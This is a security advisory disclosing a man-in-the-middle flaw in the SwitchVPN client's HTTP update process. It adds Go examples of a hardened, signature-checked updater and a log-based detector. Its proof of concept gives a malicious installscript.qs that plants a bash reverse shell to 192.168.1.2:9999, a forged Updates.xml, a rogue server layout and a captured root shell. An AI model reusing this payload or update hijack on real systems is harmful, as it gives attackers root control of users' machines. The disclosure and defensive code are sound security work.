=======================================================================
Title:              Insecure Update Process and RCE
Product:            SwitchVPN for MacOS, Windows
Vulnerable version: 2.1012.03
CVE ID:             Requested
Impact:             Critical
Homepage:           https://switchvpn.net/
Identified:         2018-11-01
By:                 Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under threat. As experts in online security we believed we could solve this problem. So we came together as a team to make SwitchVPN, a simple and powerful app to keep the internet free. SwitchVPN is simple. Install it on your phone, tablet or laptop, then just switch it on to keep the internet free. SwitchVPN is powerful. Our exclusive VPN Service technology is constantly being upgraded by a dedicated team of internet security experts."

Source: https://switchvpn.net/

Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker can leverage the update process to install malware or execute arbitrary code and fully compromise the system.

Users are urged to disable auto-updates and not to run the manual update utility until the issue has been fixed.

Vulnerability overview/description:
-----------------------------------
Insecure Update Process

The update process in the SwitchVPN client is vulnerable to a MiTM (man-in-the-middle) attack. The client either checks for the availability of a new version using the integrated auto-update function, or the user can manually initiate an update using an update utility. Version information is pulled from a remote XML file and compared to the version number of the currently installed SwitchVPN client. All requests are transmitted over HTTP, which means that an attacker on the same network is able to intercept and manipulate the traffic.
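To make the root cause concrete from the defender's side, the following is an added example written for this advisory; it is not code from the advisory or from SwitchVPN. It contrasts the check the description above implies (a manifest trusted however it was fetched, any higher version accepted, and the archive verified only against the SHA-1 carried in that same manifest) with a hardened variant that requires an HTTPS source, a vendor signature over the manifest, and a strictly newer version. Go's standard-library Ed25519 is used for the signature. The Manifest struct, its Signature field, the signed-field layout, the function names and the vendor version 2.1013.00 are all assumptions of this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha1"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// Manifest stands in for the update description the client pulls (the
// advisory's Updates.xml): offered version, archive name and archive SHA-1.
// Signature is this example's hypothetical addition; the manifest described
// in the advisory carries no signature at all.
type Manifest struct {
	Version   string
	Archive   string
	SHA1      string // hex SHA-1 of the archive
	Signature []byte // Ed25519 signature over signedBytes(), by the vendor key
}

// signedBytes is the canonical string the vendor signs; every field an
// on-path attacker could rewrite (version, archive name, hash) is covered.
func (m Manifest) signedBytes() []byte {
	return []byte(m.Version + "\n" + m.Archive + "\n" + m.SHA1 + "\n")
}

// SignManifest is the vendor-side step, done with a key the client never holds.
func SignManifest(priv ed25519.PrivateKey, m Manifest) Manifest {
	m.Signature = ed25519.Sign(priv, m.signedBytes())
	return m
}

// isNewer reports whether dotted version a is strictly newer than b, e.g.
// isNewer("2.6666.03", "2.1012.03") == true. Unparseable input is never newer.
func isNewer(a, b string) bool {
	pa, pb := strings.Split(a, "."), strings.Split(b, ".")
	for i := 0; i < len(pa) && i < len(pb); i++ {
		x, errX := strconv.Atoi(pa[i])
		y, errY := strconv.Atoi(pb[i])
		if errX != nil || errY != nil {
			return false
		}
		if x != y {
			return x > y
		}
	}
	return len(pa) > len(pb)
}

func archiveSHA1(archive []byte) string {
	sum := sha1.Sum(archive)
	return hex.EncodeToString(sum[:])
}

// InsecureAccept mirrors the behaviour the advisory describes: the manifest
// is trusted however it arrived, any higher version wins, and the archive is
// checked only against the hash in that same unauthenticated manifest, so an
// attacker serving both manifest and archive passes every check.
func InsecureAccept(m Manifest, installed string, archive []byte) bool {
	return isNewer(m.Version, installed) && archiveSHA1(archive) == m.SHA1
}

// SecureAccept is the hardened check: HTTPS-only manifest source, a valid
// vendor signature over the manifest, no downgrade or replay, and an archive
// hash that matches the now-authenticated manifest. The hash proves nothing
// by itself; the signature is what binds it to the vendor.
func SecureAccept(manifestURL string, m Manifest, installed string, archive []byte, vendorPub ed25519.PublicKey) error {
	if u, err := url.Parse(manifestURL); err != nil || u.Scheme != "https" {
		return errors.New("manifest must be fetched over https")
	}
	if !ed25519.Verify(vendorPub, m.signedBytes(), m.Signature) {
		return errors.New("manifest signature invalid: not issued by the vendor key")
	}
	if !isNewer(m.Version, installed) {
		return errors.New("offered version is not newer than installed (downgrade or replay)")
	}
	if archiveSHA1(archive) != m.SHA1 {
		return errors.New("archive hash does not match the signed manifest")
	}
	return nil
}

func main() {
	// Constructed demo data: a vendor key pair and byte strings standing in for .7z archives.
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	genuine := []byte("genuine update archive (constructed)")
	rogue := []byte("attacker-built archive (constructed)")
	vendor := SignManifest(priv, Manifest{Version: "2.1013.00", Archive: "SwitchVPN.app.7z", SHA1: archiveSHA1(genuine)})
	// The on-path rewrite from the advisory: higher version, hash of the rogue archive, no vendor signature.
	forged := Manifest{Version: "2.6666.03", Archive: "SwitchVPN.app.7z", SHA1: archiveSHA1(rogue)}
	fmt.Println("insecure client accepts forged update:", InsecureAccept(forged, "2.1012.03", rogue))
	fmt.Println("hardened client, forged:", SecureAccept("https://updates.example/Updates.xml", forged, "2.1012.03", rogue, pub))
	fmt.Println("hardened client, genuine:", SecureAccept("https://updates.example/Updates.xml", vendor, "2.1012.03", genuine, pub))
}
```

The design point is that transport security alone is not enough either: a signature over the manifest protects against a compromised mirror or CDN as well as an on-path attacker, and the version comparison inside the signed data stops an attacker from replaying an old, genuinely signed manifest to force a downgrade.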
This means that an attacker can trigger the SwitchVPN client to download a malicious update package which will be installed on the device. In addition to that, an attacker is able to implant an installation script (installscript.qs) which will get executed immediately with elevated privileges. When auto-update is enabled (which is the default setting), this process happens completely transparently to the user.

Proof of concept
----------------
In order to demonstrate the issue, a PoC for spawning a remote shell on MacOS is presented.

A demonstration video can be (temporarily) downloaded from:
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov

NOTE: Delivering a malicious payload through the main update package can be set up the same way.

1) Prepare malicious installscript.qs:
============================================================================================
...
Component.prototype.createOperations = function()
{
    component.createOperations();
    installer.execute("touch", "/tmp/pwn.sh");
    installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));
    installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));
    component.addElevatedOperation("Execute", "/tmp/pwn.sh");
    installer.installationFinished.connect(this, Component.prototype.installationFinishedPageIsShown);
}

Component.prototype.installationFinishedPageIsShown = function()
{
    console.log("Component.prototype.installationFinishedPageIsShown\n\n");
}
...
============================================================================================

2) Store "installscript.qs" in folder "com.svpn.osx" and compress to "2.6666.03meta.7z":
============================================================================================
mb:~ b$ shasum 2.6666.03meta.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f  2.6666.03meta.7z
============================================================================================

3) Prepare "Updates.xml" which will be delivered to the SwitchVPN client:
============================================================================================
{AnyApplication}
1.0.0
true
com.svpn.osx
Switch VPN
Switch VPN
2.6666.03                                  // <----- New (high) version number to trigger update
2017-10-12
true
true
true
SwitchVPN.app.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f   // <----- SHA-1 hash of 2.6666.03meta.7z
============================================================================================

4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)
============================================================================================
NOTE: Setting up a MiTM environment won't be discussed in this advisory.

Create the following folder structure for the malicious web-server:

/updates/osx/repo/com.svpn.osx

Store Updates.xml to:

/updates/osx/repo/Updates.xml

Store malicious update data to:

/updates/osx/repo/com.svpn.osx/

-rw-r--r--@ 1 b  staff  12805505 Nov  1 14:37 2.6666.03SwitchVPN.app.7z
-rw-r--r--@ 1 b  staff        40 Nov  1 14:37 2.6666.03SwitchVPN.app.7z.sha1
-rw-r--r--@ 1 b  staff       526 Nov  1 20:36 2.6666.03meta.7z   <----- contains malicious "installscript.qs"
============================================================================================

5) Start SwitchVPN client or run the manual update utility:
============================================================================================
# Requests are successfully redirected to our web-server
Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -
...
============================================================================================

6) Receive reverse shell:
============================================================================================
# Start netcat listener before starting SwitchVPN client
mb:~ b$ nc -l 9999
bash: no job control in this shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well. Both the Windows and MacOS versions are vulnerable.

Vendor contact timeline:
------------------------
2018-11-01: Contacted vendor through management@switchvpn.net
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net
2018-11-11: Requested update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.

Workaround:
-----------
None.

EOF B. Leitner / @2018
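Since the advisory offers no fix or workaround beyond disabling updates, the one thing a defender can do is watch for the traffic pattern the step-5 log shows. The following is an added example, not code from the advisory or from SwitchVPN: it parses Common Log Format lines as an egress proxy or web server writes them, picks out SwitchVPN update-repo fetches, extracts the version embedded in each artifact name, and raises an alert when a client pulls a version the vendor never published, which is the one observable trace of a forged manifest. The six log lines are the requests recorded in step 5; the seventh line, the path layout rules, the published-version allowlist and the Finding/Analyze/Alerts names are assumptions of this example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// SampleLog: the six requests from step 5 of the advisory, plus one constructed
// benign fetch of a version the vendor actually shipped.
var SampleLog = []string{
	`127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -`,
	`127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -`,
	`127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -`,
	`127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -`,
	`127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200 -`,
	`127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -`,
	`10.0.0.7 - - [01/Nov/2018 22:30:00] "GET /updates/osx/repo/com.svpn.osx/2.1012.03meta.7z HTTP/1.1" 200 -`, // constructed
}

var (
	// Common Log Format: client, ident, user, [timestamp], "METHOD path proto", status.
	clfRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)
	// Manifest fetch, with the cache-busting query string the client appends.
	manifestRe = regexp.MustCompile(`^/updates/[^/]+/repo/Updates\.xml(?:\?.*)?$`)
	// Versioned artifact under the component folder: "<version><rest>", e.g. "2.6666.03meta.7z".
	artifactRe = regexp.MustCompile(`^/updates/[^/]+/repo/[^/]+/(\d+(?:\.\d+)+)(\S+)$`)
)

type Finding struct {
	Client, Path, Kind, Version, Alert string
}

// classify names the artifact by its suffix after the version prefix.
func classify(rest string) string {
	switch {
	case strings.HasSuffix(rest, ".sha1"):
		return "hash-sidecar"
	case rest == "meta.7z":
		return "meta-archive" // carries installscript.qs, executed with elevated privileges
	case strings.HasSuffix(rest, ".7z"):
		return "payload-archive"
	}
	return "other"
}

// Analyze returns one Finding per update-repo GET. published is the set of
// versions the vendor is known to have released; a client pulling any other
// version has been handed a manifest the vendor did not write.
func Analyze(lines []string, published map[string]bool) []Finding {
	var out []Finding
	for _, line := range lines {
		m := clfRe.FindStringSubmatch(line)
		if m == nil || m[3] != "GET" {
			continue
		}
		client, path := m[1], m[4]
		if manifestRe.MatchString(path) {
			out = append(out, Finding{Client: client, Path: path, Kind: "manifest"})
			continue
		}
		a := artifactRe.FindStringSubmatch(path)
		if a == nil {
			continue
		}
		f := Finding{Client: client, Path: path, Kind: classify(a[2]), Version: a[1]}
		if !published[f.Version] {
			f.Alert = "update version " + f.Version + " was never published by the vendor"
		}
		out = append(out, f)
	}
	return out
}

// Alerts keeps only the findings that need attention.
func Alerts(fs []Finding) []Finding {
	var out []Finding
	for _, f := range fs {
		if f.Alert != "" {
			out = append(out, f)
		}
	}
	return out
}

func main() {
	// Allowlist assumption: 2.1012.03 is the only version the vendor has shipped.
	for _, f := range Analyze(SampleLog, map[string]bool{"2.1012.03": true}) {
		fmt.Printf("%-10s %-16s %-10s %s\n", f.Client, f.Kind, f.Version, f.Alert)
	}
}
```

Run against the step-5 lines, the two manifest fetches are recorded without an alert, while the meta archive, the hash sidecar and the payload archive all trip the unpublished-version rule; the constructed 2.1012.03 fetch passes. The allowlist has to be maintained from the vendor's release notes rather than from the update feed itself, because, as the advisory shows, the feed is exactly what an on-path attacker controls.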